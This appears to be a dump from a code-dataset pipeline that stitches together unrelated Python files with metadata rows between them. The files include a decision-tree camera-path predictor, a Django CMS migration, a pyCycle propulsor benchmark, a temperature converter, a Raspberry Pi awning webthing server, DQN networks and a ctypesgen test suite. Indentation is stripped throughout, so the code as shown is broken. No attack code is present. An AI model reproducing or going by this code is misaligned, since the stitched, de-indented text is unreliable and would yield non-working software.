else:
if cam_id != path_stack[-1]:
path_stack.append(cam_id)
return path_stack
def _judge_accuracy(predict_array, real_array):
correct = 0
for i in range(len(predict_array)):
if predict_array[i] == real_array[i]:
# print(predict_array[i], real_array[i])
correct += 1
# else:
# print('错误:', predict_array[i], '实际:', real_array[i])
correct_rate = correct / len(predict_array)
return correct_rate * 100
def _judge_accuracy_stack(predict_array_list, labels, label_dealy_list, input_frame):
correct_list = [0 for _ in range(len(label_dealy_list))]
index_start = label_dealy_list[-1] + input_frame - 1 # 10+45=55-1=54
for i in range(index_start, len(predict_array_list)): # 从54到179
real_stack = _generate_path(labels[i:])
for j in range(1, len(label_dealy_list) + 1): # 从1到6个,依次取前1,2,3,4,5,6个
predict_stack = _generate_path(predict_array_list[i][:j])
print(i, j, 'real:', real_stack, 'prediction:', predict_stack, predict_array_list[i][:j])
correct_list[j-1] += 1 # 预先假设正确加1
# if len(predict_stack) > len(real_stack): # 预测多走了摄像头
# print('错误')
# correct_list[j - 1] -= 1 # 有一个错误直接减1
# continue
for n in range(len(predict_stack)):
try:
if predict_stack[n] != real_stack[n]:
print('错误')
correct_list[j - 1] -= 1 # 有一个错误直接减1
break
except:
break
print(correct_list, len(predict_array_list) - index_start)
for i in range(len(correct_list)):
correct_list[i] /= len(predict_array_list) - index_start
print(correct_list)
def _train_model_save(x_inner, y_inner, name):
print('---------', name, '---------')
# SVM-linear过慢
'''
print("进行SVM-linear训练")
start = time.time()
clf_linear = SVC(kernel='linear').fit(x_inner, y_inner)
joblib.dump(clf_linear, "ML_model/model_linear_" + name + ".m")
end = time.time()
print("执行时间:", end - start)
'''
# print("进行SVM-rbf训练")
# start = time.time()
# clf_rbf = SVC().fit(x_inner, y_inner)
# joblib.dump(clf_rbf, "ML_model/model_rbf_" + name + ".m")
# end = time.time()
# print("执行时间:", end - start)
# print("进行SVM-sigmoid训练")
# start = time.time()
# clf_sigmoid = SVC(kernel='sigmoid').fit(x_inner, y_inner)
# joblib.dump(clf_sigmoid, "ML_model/model_sigmoid_" + name + ".m")
# end = time.time()
# print("执行时间:", end - start)
print("进行决策树训练")
start = time.time()
clf = DecisionTreeClassifier(max_depth=5).fit(x_inner, y_inner)
joblib.dump(clf, "ML_model/model_tree_" + name + ".m")
end = time.time()
print("执行时间:", end - start)
# print("进行神经网络训练")
# start = time.time()
# sc = StandardScaler().fit(x_inner) # 神经网络和逻辑回归需要预处理数据
# x_inner = sc.transform(x_inner)
# mlp = MLPClassifier(hidden_layer_sizes=(13, 13, 13), max_iter=500).fit(x_inner, y_inner)
# joblib.dump(mlp, "ML_model/model_mlp_" + name + ".m")
# end = time.time()
# print("执行时间:", end - start)
# print("进行逻辑回归训练")
# start = time.time()
# log_reg = linear_model.LogisticRegression(C=1e5).fit(x_inner, y_inner)
# joblib.dump(log_reg, "ML_model/model_logreg_" + name + ".m")
# end = time.time()
# print("执行时间:", end - start)
# print('-----------------')
def train_model(train_file_inner, input_frame_number_inner, input_label_delay_inner):
for number in input_label_delay_inner:
print('---------', number, '---------')
data = []
labels = []
max_train_num = 20000
mode = 6
for train_file_each in train_file_inner:
delay = number # 改为数组后这个需要放这重置delay
with open(train_file_each) as file:
for line in file:
tokens = line.strip().split(',')
# mode4: 筛选出1234摄像头,其余数据不读取
if mode == 4: # 这里已经没用因为cam4单独分出来文件了
if tokens[0] not in ['1', '2', '3', '4', '7', '9', '10', '11', '12', '13']:
# print('delete:', tokens)
continue
data.append([tk for tk in tokens[1:]])
if delay != 0: # 推迟label
delay -= 1
continue
labels.append(tokens[0])
if number:
data = data[:-number] # 删去后面几位
# print(len(data), len(labels), data[0], data[-1])
if input_frame_number_inner != 1:
delay_vector = input_frame_number_inner
temp_vector = []
temp_data = []
# 由于上面已经延迟,所以每个输入对应的输出是输入的最后一行后面的标签
for line_idx in range(len(data)-input_frame_number_inner+1):
temp_idx = line_idx
while delay_vector:
temp_vector += data[temp_idx]
# print('临时为:', temp_vector)
temp_idx += 1
delay_vector -= 1
delay_vector = input_frame_number_inner
temp_data.append(temp_vector)
temp_vector = []
data = temp_data
labels = labels[input_frame_number_inner-1:]
if len(data) > max_train_num: # 控制最大读取行数
data = data[-max_train_num:]
labels = labels[-max_train_num:]
print("输入维度为:", len(data[0]))
x = np.array(data)
y = np.array(labels)
print("总data样本数为:", len(x))
print("总label样本数为:", len(y))
# 输出所有数据
# for i, line in enumerate(data):
# print(len(line), line, labels[i])
_train_model_save(x, y, str(number))
def cal_accuracy(test_file_inner, input_frame_number_inner, input_label_delay_inner):
test_X_result = []
test_Y = []
with open(test_file_inner) as file:
for line in file:
tokens = line.strip().split(',')
test_Y.append(tokens[0])
for __ in range(180): # 临时180
test_X_result.append([])
for number in input_label_delay_inner:
print('---------', number, '---------')
data = []
labels = []
delay = number
with open(test_file_inner) as file:
for line in file:
tokens = line.strip().split(',')
data.append([tk for tk in tokens[1:]])
if delay != 0: # 推迟label
delay -= 1
continue
labels.append(tokens[0])
if number != 0:
data = data[:-number] # 删去后面几位
if input_frame_number_inner != 1:
delay_vector = input_frame_number_inner
temp_vector = []
temp_data = []
# 由于上面已经延迟,所以每个输入对应的输出是输入的最后一行后面的标签
for line_idx in range(len(data)-input_frame_number_inner+1):
temp_idx = line_idx
while delay_vector:
temp_vector += data[temp_idx]
# print('临时为:', temp_vector)
temp_idx += 1
delay_vector -= 1
delay_vector = input_frame_number_inner
temp_data.append(temp_vector)
temp_vector = []
data = temp_data
labels = labels[input_frame_number_inner-1:]
test_X = np.array(data)
# test_Y = np.array(labels)
# print("读取输入样本数为:", len(test_X))
# print("读取输出样本数为:", len(test_Y))
'''
start = time.time()
clf_linear_global = joblib.load("model_2cam/model_linear_global.m")
test_X_result = clf_linear_global.predict(test_X)
# print("linear全局预测准确率:", _judge_accuracy(test_X_result, test_Y_global))
print("linear全局预测准确率:", _judge_accuracy_ave(test_X_result, test_Y_global))
end = time.time()
print("执行时间:", end - start)
'''
# start = time.time()
# clf_rbf_global = joblib.load("ML_model/model_rbf_global.m")
# test_X_result = clf_rbf_global.predict(test_X)
# # print(test_X_result)
# # print(test_Y)
# print("rbf全局预测准确率:", _judge_accuracy(test_X_result, test_Y))
# end = time.time()
# print("执行时间:", end - start)
# start = time.time()
# clf_sigmoid_global = joblib.load("ML_model/model_sigmoid_global.m")
# test_X_result = clf_sigmoid_global.predict(test_X)
# print("sigmoid全局预测准确率:", _judge_accuracy(test_X_result, test_Y))
# end = time.time()
# print("执行时间:", end - start)
load_name = "ML_model/model_tree_" + str(number) + '.m'
start = time.time()
clf_tree_global = joblib.load(load_name)
test_X_result_temp = clf_tree_global.predict(test_X)
print(test_X_result_temp)
end = time.time()
print("执行时间:", end - start)
for i, result in enumerate(test_X_result_temp):
test_X_result[input_frame_number_inner + number - 1 + i].append(result)
# # LOC和MLP用
# sc = StandardScaler().fit(test_X)
# test_X = sc.transform(test_X)
#
# start = time.time()
# clf_logreg_global = joblib.load("ML_model/model_logreg_global.m")
# test_X_result = clf_logreg_global.predict(test_X)
# print("logreg全局预测准确率:", _judge_accuracy(test_X_result, test_Y))
# end = time.time()
# print("执行时间:", end - start)
#
# start = time.time()
# clf_mlp_global = joblib.load("ML_model/model_mlp_global.m")
# test_X_result = clf_mlp_global.predict(test_X)
# print("mlp全局预测准确率:", _judge_accuracy(test_X_result, test_Y))
# end = time.time()
# print("执行时间:", end - start)
for i, res in enumerate(test_X_result):
print(i, res)
_judge_accuracy_stack(test_X_result, test_Y, input_label_delay_inner, input_frame_number_inner)
if __name__ == '__main__':
glo_start = time.time()
test_file = "gallery/15-21/15-21_person_1_ML.csv"
# 180s
# train_file = ['gallery/14-23/14-23_person_0_ML.csv', 'gallery/14-23/14-23_person_1_ML.csv',
# 'gallery/14-23/14-23_person_2_ML.csv']
# 360s
train_file = ['gallery/14-12/14-12_person_0_ML.csv', 'gallery/14-12/14-12_person_1_ML.csv',
'gallery/14-12/14-12_person_2_ML.csv', 'gallery/14-14/14-14_person_0_ML.csv',
'gallery/14-14/14-14_person_1_ML.csv', 'gallery/14-14/14-14_person_2_ML.csv']
# 720s
# train_file = ['gallery/14-12/14-12_person_0_ML.csv', 'gallery/14-12/14-12_person_1_ML.csv',
# 'gallery/14-12/14-12_person_2_ML.csv', 'gallery/14-14/14-14_person_0_ML.csv',
# 'gallery/14-14/14-14_person_1_ML.csv', 'gallery/14-14/14-14_person_2_ML.csv',
# 'gallery/14-23/14-23_person_0_ML.csv', 'gallery/14-23/14-23_person_1_ML.csv',
# 'gallery/14-23/14-23_person_2_ML.csv', 'gallery/14-32/14-32_person_0_ML.csv',
# 'gallery/14-32/14-32_person_1_ML.csv', 'gallery/14-32/14-32_person_2_ML.csv',]
# 720s
# train_file = ['gallery/14-32/14-32_person_0_ML.csv', 'gallery/14-32/14-32_person_1_ML.csv',
# 'gallery/14-32/14-32_person_2_ML.csv',
# 'gallery/14-36/14-36_person_0_ML.csv', 'gallery/14-36/14-36_person_1_ML.csv',
# 'gallery/14-36/14-36_person_2_ML.csv',
# 'gallery/14-38/14-38_person_0_ML.csv', 'gallery/14-38/14-38_person_1_ML.csv',
# 'gallery/14-38/14-38_person_2_ML.csv',
# 'gallery/14-45/14-45_person_0_ML.csv', 'gallery/14-45/14-45_person_1_ML.csv',
# 'gallery/14-45/14-45_person_2_ML.csv']
# 3480s
# train_file = ['gallery/14-08/14-08_person_0_ML.csv', 'gallery/14-08/14-08_person_1_ML.csv',
# 'gallery/14-08/14-08_person_2_ML.csv',
# 'gallery/14-12/14-12_person_0_ML.csv', 'gallery/14-12/14-12_person_1_ML.csv',
# 'gallery/14-12/14-12_person_2_ML.csv',
# 'gallery/14-14/14-14_person_0_ML.csv', 'gallery/14-14/14-14_person_1_ML.csv',
# 'gallery/14-14/14-14_person_2_ML.csv',
# 'gallery/14-23/14-23_person_0_ML.csv', 'gallery/14-23/14-23_person_1_ML.csv',
# 'gallery/14-23/14-23_person_2_ML.csv',
# 'gallery/14-32/14-32_person_0_ML.csv', 'gallery/14-32/14-32_person_1_ML.csv',
# 'gallery/14-32/14-32_person_2_ML.csv',
# 'gallery/14-36/14-36_person_0_ML.csv', 'gallery/14-36/14-36_person_1_ML.csv',
# 'gallery/14-36/14-36_person_2_ML.csv',
# 'gallery/14-38/14-38_person_0_ML.csv', 'gallery/14-38/14-38_person_1_ML.csv',
# 'gallery/14-38/14-38_person_2_ML.csv',
# 'gallery/14-45/14-45_person_0_ML.csv', 'gallery/14-45/14-45_person_1_ML.csv',
# 'gallery/14-45/14-45_person_2_ML.csv',
# 'gallery/14-52/14-52_person_0_ML.csv', 'gallery/14-52/14-52_person_1_ML.csv',
# 'gallery/14-52/14-52_person_2_ML.csv',
# 'gallery/14-55/14-55_person_0_ML.csv', 'gallery/14-55/14-55_person_1_ML.csv',
# 'gallery/14-55/14-55_person_2_ML.csv',
# 'gallery/14-58/14-58_person_0_ML.csv', 'gallery/14-58/14-58_person_1_ML.csv',
# 'gallery/14-58/14-58_person_2_ML.csv',
# 'gallery/15-00/15-00_person_0_ML.csv', 'gallery/15-00/15-00_person_1_ML.csv',
# 'gallery/15-00/15-00_person_2_ML.csv',
# 'gallery/15-14/15-14_person_0_ML.csv', 'gallery/15-14/15-14_person_1_ML.csv',
# 'gallery/15-14/15-14_person_2_ML.csv', 'gallery/15-14/15-14_person_3_ML.csv',
# 'gallery/15-18/15-18_person_0_ML.csv', 'gallery/15-18/15-18_person_1_ML.csv',
# 'gallery/15-18/15-18_person_2_ML.csv', 'gallery/15-18/15-18_person_3_ML.csv',
# 'gallery/15-21/15-21_person_0_ML.csv', 'gallery/15-21/15-21_person_1_ML.csv',
# 'gallery/15-21/15-21_person_2_ML.csv', 'gallery/15-21/15-21_person_3_ML.csv',
# 'gallery/15-28/15-28_person_0_ML.csv', 'gallery/15-28/15-28_person_1_ML.csv',
# 'gallery/15-28/15-28_person_2_ML.csv', 'gallery/15-28/15-28_person_3_ML.csv',
# 'gallery/15-28/15-28_person_4_ML.csv',
# 'gallery/15-36/15-36_person_0_ML.csv', 'gallery/15-36/15-36_person_1_ML.csv',
# 'gallery/15-36/15-36_person_2_ML.csv', 'gallery/15-36/15-36_person_3_ML.csv',
# 'gallery/15-36/15-36_person_4_ML.csv',
# ]
input_frame_number = 3 # 输入学习帧数
input_label_delay = [1, 3, 9, 15, 30, 45] # 预测样本和标签差
train_model(train_file, input_frame_number, input_label_delay)
cal_accuracy(test_file, input_frame_number, input_label_delay)
glo_end = time.time()
print('global', glo_end - glo_start)
| 10,993 | 0 | 138 |
a8da6c27168c030127b89099f0e61debcd9543af | 3,829 | py | Python | src/automations/cms_automations/migrations/0001_initial.py | sebastianmanger/django-automations | 070e700d29ef68f1b27c7f016ee6a08c41be56fe | [
"MIT"
] | 20 | 2021-04-25T16:19:09.000Z | 2022-02-17T13:55:57.000Z | src/automations/cms_automations/migrations/0001_initial.py | sebastianmanger/django-automations | 070e700d29ef68f1b27c7f016ee6a08c41be56fe | [
"MIT"
] | 25 | 2021-11-21T14:39:59.000Z | 2022-02-01T11:32:17.000Z | src/automations/cms_automations/migrations/0001_initial.py | sebastianmanger/django-automations | 070e700d29ef68f1b27c7f016ee6a08c41be56fe | [
"MIT"
] | 4 | 2021-11-21T04:27:55.000Z | 2022-03-04T01:37:06.000Z | # Generated by Django 3.1.8 on 2021-05-02 11:09
import django.db.models.deletion
from django.db import migrations, models
| 33.587719 | 108 | 0.402455 | # Generated by Django 3.1.8 on 2021-05-02 11:09
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
("cms", "0022_auto_20180620_1551"),
]
operations = [
migrations.CreateModel(
name="AutomationHookPlugin",
fields=[
(
"cmsplugin_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
related_name="cms_automations_automationhookplugin",
serialize=False,
to="cms.cmsplugin",
),
),
(
"automation",
models.CharField(max_length=128, verbose_name="Automation"),
),
(
"token",
models.CharField(
blank=True, max_length=128, verbose_name="Optional token"
),
),
],
options={
"abstract": False,
},
bases=("cms.cmsplugin",),
),
migrations.CreateModel(
name="AutomationStatusPlugin",
fields=[
(
"cmsplugin_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
related_name="cms_automations_automationstatusplugin",
serialize=False,
to="cms.cmsplugin",
),
),
(
"template",
models.CharField(max_length=128, verbose_name="Task data"),
),
("name", models.CharField(blank=True, max_length=128)),
],
options={
"abstract": False,
},
bases=("cms.cmsplugin",),
),
migrations.CreateModel(
name="AutomationTasksPlugin",
fields=[
(
"cmsplugin_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
related_name="cms_automations_automationtasksplugin",
serialize=False,
to="cms.cmsplugin",
),
),
(
"template",
models.CharField(
choices=[
("automations/includes/task_list.html", "Default template")
],
default="automations/includes/task_list.html",
max_length=128,
verbose_name="Template",
),
),
(
"always_inform",
models.BooleanField(
default=True,
help_text="If deactivated plugin will out output anything if no task is available.",
verbose_name="Always inform",
),
),
],
options={
"abstract": False,
},
bases=("cms.cmsplugin",),
),
]
| 0 | 3,682 | 23 |
3771c6c2f4d9250af64216e9c17b431cf831fb7a | 988 | py | Python | ivy/ext/ivy_shortcodes.py | swsch/ivy | 4932cf7541acff13815be613b0f3335b21c86670 | [
"Unlicense"
] | null | null | null | ivy/ext/ivy_shortcodes.py | swsch/ivy | 4932cf7541acff13815be613b0f3335b21c86670 | [
"Unlicense"
] | null | null | null | ivy/ext/ivy_shortcodes.py | swsch/ivy | 4932cf7541acff13815be613b0f3335b21c86670 | [
"Unlicense"
] | null | null | null | import ivy
import sys
try:
import shortcodes
except ImportError:
shortcodes = None
# Use a single parser instance to parse all files.
parser = None
# The bare 'shortcodes' attribute for custom settings is deprecated.
if shortcodes:
@ivy.filters.register('node_text')
| 28.228571 | 73 | 0.601215 | import ivy
import sys
try:
import shortcodes
except ImportError:
shortcodes = None
# Use a single parser instance to parse all files.
parser = None
# The bare 'shortcodes' attribute for custom settings is deprecated.
if shortcodes:
@ivy.filters.register('node_text')
def render(text, node):
global parser
if parser is None:
new_settings = ivy.site.config.get('shortcode_settings')
old_settings = ivy.site.config.get('shortcodes')
settings = new_settings or old_settings or {}
parser = shortcodes.Parser(**settings)
try:
return parser.parse(text, node)
except shortcodes.ShortcodeError as err:
msg = "Shortcode Error\n"
msg += f">> Node: {node.url}\n"
msg += f">> {err.__class__.__name__}: {err}"
if (cause := err.__cause__):
msg += f"\n>> Cause: {cause.__class__.__name__}: {cause}"
sys.exit(msg)
| 677 | 0 | 26 |
72d447079357ad9532eb8adbf4c6e89fc73bc0c4 | 2,270 | py | Python | example_cycles/tests/benchmark_electric_propulsor.py | askprash/pyCycle | e0845d7e320b6cb47367734c26ec3410c9fa5bf7 | [
"Apache-2.0"
] | null | null | null | example_cycles/tests/benchmark_electric_propulsor.py | askprash/pyCycle | e0845d7e320b6cb47367734c26ec3410c9fa5bf7 | [
"Apache-2.0"
] | null | null | null | example_cycles/tests/benchmark_electric_propulsor.py | askprash/pyCycle | e0845d7e320b6cb47367734c26ec3410c9fa5bf7 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import unittest
import os
import openmdao.api as om
from openmdao.utils.assert_utils import assert_near_equal
import pycycle.api as pyc
from example_cycles.electric_propulsor import MPpropulsor
if __name__ == "__main__":
unittest.main() | 31.527778 | 79 | 0.644053 | import numpy as np
import unittest
import os
import openmdao.api as om
from openmdao.utils.assert_utils import assert_near_equal
import pycycle.api as pyc
from example_cycles.electric_propulsor import MPpropulsor
class ElectricPropulsorTestCase(unittest.TestCase):
def benchmark_case1(self):
prob = om.Problem()
prob.model = mp_propulsor = MPpropulsor()
prob.set_solver_print(level=-1)
prob.set_solver_print(level=2, depth=2)
prob.setup()
#Define the design point
prob.set_val('design.fc.alt', 10000, units='m')
prob.set_val('design.fc.MN', 0.8)
prob.set_val('design.inlet.MN', 0.6)
prob.set_val('design.fan.PR', 1.2)
prob.set_val('pwr_target', -3486.657, units='hp')
prob.set_val('design.fan.eff', 0.96)
prob.set_val('off_design.fc.alt', 12000, units='m')
# Set initial guesses for balances
prob['design.balance.W'] = 200.
for i, pt in enumerate(mp_propulsor.od_pts):
# initial guesses
prob['off_design.fan.PR'] = 1.2
prob['off_design.balance.W'] = 406.790
prob['off_design.balance.Nmech'] = 1. # normalized value
prob.model.design.nonlinear_solver.options['atol'] = 1e-6
prob.model.design.nonlinear_solver.options['rtol'] = 1e-6
prob.model.off_design.nonlinear_solver.options['atol'] = 1e-6
prob.model.off_design.nonlinear_solver.options['rtol'] = 1e-6
prob.model.off_design.nonlinear_solver.options['maxiter'] = 10
self.prob = prob
prob.run_model()
tol = 1e-5
assert_near_equal(prob['design.fc.Fl_O:stat:W'], 406.790, tol)
assert_near_equal(prob['design.nozz.Fg'], 12070.380, tol)
assert_near_equal(prob['design.fan.SMN'], 36.64057531, tol)
assert_near_equal(prob['design.fan.SMW'], 29.886, tol)
assert_near_equal(prob['off_design.fc.Fl_O:stat:W'], 315.3438487 , tol)
assert_near_equal(prob['off_design.nozz.Fg'], 9653.17011134, tol)
assert_near_equal(prob['off_design.fan.SMN'], 22.13770028, tol)
assert_near_equal(prob['off_design.fan.SMW'], 18.95649308, tol)
if __name__ == "__main__":
unittest.main() | 1,924 | 30 | 51 |
836c857326383b2e3a35255f393ce2a2ae805a24 | 758 | py | Python | beta.py | SecDet65/bug-py | d311d6621e8d7edd0bf43ba632690c0842188f06 | [
"Apache-2.0"
] | null | null | null | beta.py | SecDet65/bug-py | d311d6621e8d7edd0bf43ba632690c0842188f06 | [
"Apache-2.0"
] | null | null | null | beta.py | SecDet65/bug-py | d311d6621e8d7edd0bf43ba632690c0842188f06 | [
"Apache-2.0"
] | null | null | null | import os
print(':::IMPORTANTE::: USE AS LETRAS CORRESPONDENTES => C (CESIUS), K (KELVIN) OU F (FIRENHEIT)\n\n')
temp = input('Qual temperatura quer saber? ')
tv = float(input('Digite o valor da temperatura: '))
if(temp == 'c'):
fah = ((tv * 1.8) + 32)
kel = (tv + 273.15)
cel = tv
print('Fahrenheit {}\nKelvin {}\nCelsius {:.0f}' . format(fah,kel,cel))
if(temp == 'k'):
fahk = ((tv * 1.8) - 459.7)
kelk = (tv - 273.15)
celk = tv
print('Fahrenheit {}\nCelsius {}\nKelvin {:.0f}' . format(fahk,kelk,celk))
if(temp == 'f'):
fpk = ((tv + 459.67) * 5/9)
fpc = ((tv - 32) / 1.8)
celf = tv
print('Kelvin {}\nCelsius {}\nFahrenheit {:.0f}' . format(fpk,fpc,celf))
os.system('Pause')
| 30.32 | 105 | 0.53562 | import os
print(':::IMPORTANTE::: USE AS LETRAS CORRESPONDENTES => C (CESIUS), K (KELVIN) OU F (FIRENHEIT)\n\n')
temp = input('Qual temperatura quer saber? ')
tv = float(input('Digite o valor da temperatura: '))
if(temp == 'c'):
fah = ((tv * 1.8) + 32)
kel = (tv + 273.15)
cel = tv
print('Fahrenheit {}\nKelvin {}\nCelsius {:.0f}' . format(fah,kel,cel))
if(temp == 'k'):
fahk = ((tv * 1.8) - 459.7)
kelk = (tv - 273.15)
celk = tv
print('Fahrenheit {}\nCelsius {}\nKelvin {:.0f}' . format(fahk,kelk,celk))
if(temp == 'f'):
fpk = ((tv + 459.67) * 5/9)
fpc = ((tv - 32) / 1.8)
celf = tv
print('Kelvin {}\nCelsius {}\nFahrenheit {:.0f}' . format(fpk,fpc,celf))
os.system('Pause')
| 0 | 0 | 0 |
0ff93bc15d5ca9cabbe6220722dd3204ded3de54 | 5,079 | py | Python | pi_awning_webthing/awning_webthing.py | grro/pi_awning_webthing | c3186b9947a74d9cc2a9ba4a079b9201e769ba25 | [
"Apache-2.0"
] | null | null | null | pi_awning_webthing/awning_webthing.py | grro/pi_awning_webthing | c3186b9947a74d9cc2a9ba4a079b9201e769ba25 | [
"Apache-2.0"
] | null | null | null | pi_awning_webthing/awning_webthing.py | grro/pi_awning_webthing | c3186b9947a74d9cc2a9ba4a079b9201e769ba25 | [
"Apache-2.0"
] | null | null | null | from webthing import (MultipleThings, Property, Thing, Value, WebThingServer)
from pi_awning_webthing.awning import Awning, AwningPropertyListener
from pi_awning_webthing.switch import Switch
from pi_awning_webthing.motor_tb6612Fng import load_tb6612fng
from time import sleep
import logging
import tornado.ioloop
# regarding capabilities refer https://iot.mozilla.org/schemas
# there is also another schema registry http://iotschema.org/docs/full.html not used by webthing
| 37.902985 | 129 | 0.573538 | from webthing import (MultipleThings, Property, Thing, Value, WebThingServer)
from pi_awning_webthing.awning import Awning, AwningPropertyListener
from pi_awning_webthing.switch import Switch
from pi_awning_webthing.motor_tb6612Fng import load_tb6612fng
from time import sleep
import logging
import tornado.ioloop
class WebThingAwningPropertyListener(AwningPropertyListener):
def __init__(self, anwing_webthing):
self.anwing_webthing = anwing_webthing
def on_current_pos_updated(self, current_position: int):
self.anwing_webthing.ioloop.add_callback(self.anwing_webthing.set_current_position, current_position)
def on_retracting_updated(self, retracting: bool):
self.anwing_webthing.ioloop.add_callback(self.anwing_webthing.set_retracting, retracting)
def on_extenting_updated(self, extenting: bool):
self.anwing_webthing.ioloop.add_callback(self.anwing_webthing.set_extending, extenting)
class AnwingWebThing(Thing):
# regarding capabilities refer https://iot.mozilla.org/schemas
# there is also another schema registry http://iotschema.org/docs/full.html not used by webthing
def __init__(self, description: str, awning: Awning):
Thing.__init__(
self,
'urn:dev:ops:anwing-TB6612FNG',
'Awning ' + awning.name + " Controller",
['MultiLevelSensor'],
description
)
self.awning = awning
self.awning.register_listener(WebThingAwningPropertyListener(self))
self.target_position = Value(0, self.__target_position)
self.add_property(
Property(self,
'target_position',
self.target_position,
metadata={
'@type': 'LevelProperty',
'title': 'Awning target position',
"type": "integer",
"minimum": 0,
"maximum": 100,
"unit": "percent",
'description': 'awning target position'
}))
self.current_position = Value(0)
self.add_property(
Property(self,
'current_position',
self.current_position,
metadata={
'@type': 'LevelProperty',
'title': 'Awning current position',
"type": "integer",
'minimum': 0,
'maximum': 100,
"unit": "percent",
'readOnly': True,
'description': 'awning current position'
}))
self.retracting = Value(0)
self.add_property(
Property(self,
'retracting',
self.retracting,
metadata={
'@type': 'BooleanProperty',
'title': 'Awning is retracting',
"type": "boolean",
'readOnly': True,
'description': 'Awning is retracting'
}))
self.extending = Value(0)
self.add_property(
Property(self,
'extending',
self.extending,
metadata={
'@type': 'BooleanProperty',
'title': 'Awning is extending',
"type": "boolean",
'readOnly': True,
'description': 'Awning is extending'
}))
self.ioloop = tornado.ioloop.IOLoop.current()
def __target_position(self, new_postion):
self.awning.set_target_position(new_postion)
def set_current_position(self, value):
self.current_position.notify_of_external_update(value)
logging.debug(self.awning.name + " position " + str(value) + " reached (target=" + str(self.target_position.get()) + ")")
def set_retracting(self, value):
self.retracting.notify_of_external_update(value)
def set_extending(self, value):
self.extending.notify_of_external_update(value)
def run_server(port: int, filename: str, switch_pin_forward: int, switch_pin_backward: int, description: str):
while True:
awnings = [Awning(motor) for motor in load_tb6612fng(filename)]
awning_webthings = [AnwingWebThing(description, anwing) for anwing in awnings]
server = WebThingServer(MultipleThings(awning_webthings, 'Awnings'), port=port, disable_host_validation=True)
if switch_pin_forward > 0 and switch_pin_backward > 0:
Switch(switch_pin_forward, switch_pin_backward, awnings= awnings)
try:
logging.info('starting the server')
server.start()
except KeyboardInterrupt:
logging.info('stopping the server')
server.stop()
logging.info('done')
return
except Exception as e:
logging.error(e)
sleep(3)
| 4,233 | 47 | 312 |
b6c77329018b75234038e92dc58bc0aed4fb2fad | 1,154 | py | Python | q_functions.py | brett-daley/dqn-lambda | e1bbbaecf18cdc9f8edfbef8075b988a61e21235 | [
"MIT"
] | 19 | 2020-02-17T06:47:40.000Z | 2022-03-30T21:39:49.000Z | q_functions.py | brett-daley/dqn-lambda | e1bbbaecf18cdc9f8edfbef8075b988a61e21235 | [
"MIT"
] | 6 | 2020-01-28T23:11:31.000Z | 2022-02-10T00:39:48.000Z | q_functions.py | brett-daley/dqn-lambda | e1bbbaecf18cdc9f8edfbef8075b988a61e21235 | [
"MIT"
] | 5 | 2020-01-31T05:29:24.000Z | 2022-03-15T08:30:06.000Z | import tensorflow as tf
from tensorflow.python.layers.layers import *
| 38.466667 | 92 | 0.681109 | import tensorflow as tf
from tensorflow.python.layers.layers import *
def cartpole_mlp(state, n_actions, scope):
hidden = flatten(state) # flatten to make sure 2-D
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
hidden = dense(hidden, units=512, activation=tf.nn.tanh)
hidden = dense(hidden, units=512, activation=tf.nn.tanh)
qvalues = dense(hidden, units=n_actions, activation=None)
return qvalues
def atari_cnn(state, n_actions, scope):
hidden = tf.cast(state, tf.float32) / 255.0
hidden = tf.unstack(hidden, axis=1)
hidden = tf.concat(hidden, axis=-1)
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
hidden = conv2d(hidden, filters=32, kernel_size=8, strides=4, activation=tf.nn.relu)
hidden = conv2d(hidden, filters=64, kernel_size=4, strides=2, activation=tf.nn.relu)
hidden = conv2d(hidden, filters=64, kernel_size=3, strides=1, activation=tf.nn.relu)
hidden = flatten(hidden)
hidden = dense(hidden, units=512, activation=tf.nn.relu)
qvalues = dense(hidden, units=n_actions, activation=None)
return qvalues
| 1,036 | 0 | 46 |
71a31accb034925ee37a6aa3d035b5ee027cd116 | 78,984 | py | Python | ctypesgen/test/testsuite.py | EPC-MSU/ctypesgen | 21979b7dce0382f3e78ca18efc552217c60c46ef | [
"BSD-2-Clause"
] | null | null | null | ctypesgen/test/testsuite.py | EPC-MSU/ctypesgen | 21979b7dce0382f3e78ca18efc552217c60c46ef | [
"BSD-2-Clause"
] | null | null | null | ctypesgen/test/testsuite.py | EPC-MSU/ctypesgen | 21979b7dce0382f3e78ca18efc552217c60c46ef | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: ascii -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
#
"""Simple test suite using unittest.
By clach04 (Chris Clark).
Calling:
python test/testsuite.py
or
cd test
./testsuite.py
Could use any unitest compatible test runner (nose, etc.)
Aims to test for regressions. Where possible use stdlib to
avoid the need to compile C code.
Known to run clean with:
* 32bit Linux (python 2.5.2, 2.6)
* 32bit Windows XP (python 2.4, 2.5, 2.6.1)
"""
import sys
import os
import ctypes
import math
import unittest
import logging
from subprocess import Popen, PIPE
test_directory = os.path.abspath(os.path.dirname(__file__))
sys.path.append(test_directory)
sys.path.append(os.path.join(test_directory, os.pardir))
import ctypesgentest # TODO consider moving test() from ctypesgentest into this module
def cleanup_json_src_paths(json):
"""
JSON stores the path to some source items. These need to be genericized in
order for tests to succeed on all machines/user accounts.
"""
TYPES_W_PATHS = ["CtypesStruct", "CtypesEnum"]
for i in json:
if "ctype" in i and i["ctype"]["Klass"] in TYPES_W_PATHS:
i["ctype"]["src"][0] = "/some-path/temp.h"
class StdBoolTest(unittest.TestCase):
"Test correct parsing and generation of bool type"
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
"""
header_str = """
#include <stdbool.h>
struct foo
{
bool is_bar;
int a;
};
"""
self.module, _ = ctypesgentest.test(header_str) # , all_headers=True)
def test_stdbool_type(self):
"""Test is bool is correctly parsed"""
module = self.module
struct_foo = module.struct_foo
self.assertEqual(struct_foo._fields_, [("is_bar", ctypes.c_bool), ("a", ctypes.c_int)])
class SimpleMacrosTest(unittest.TestCase):
"""Based on simple_macros.py
"""
def setUp(self):
"""NOTE this is called once for each test* method
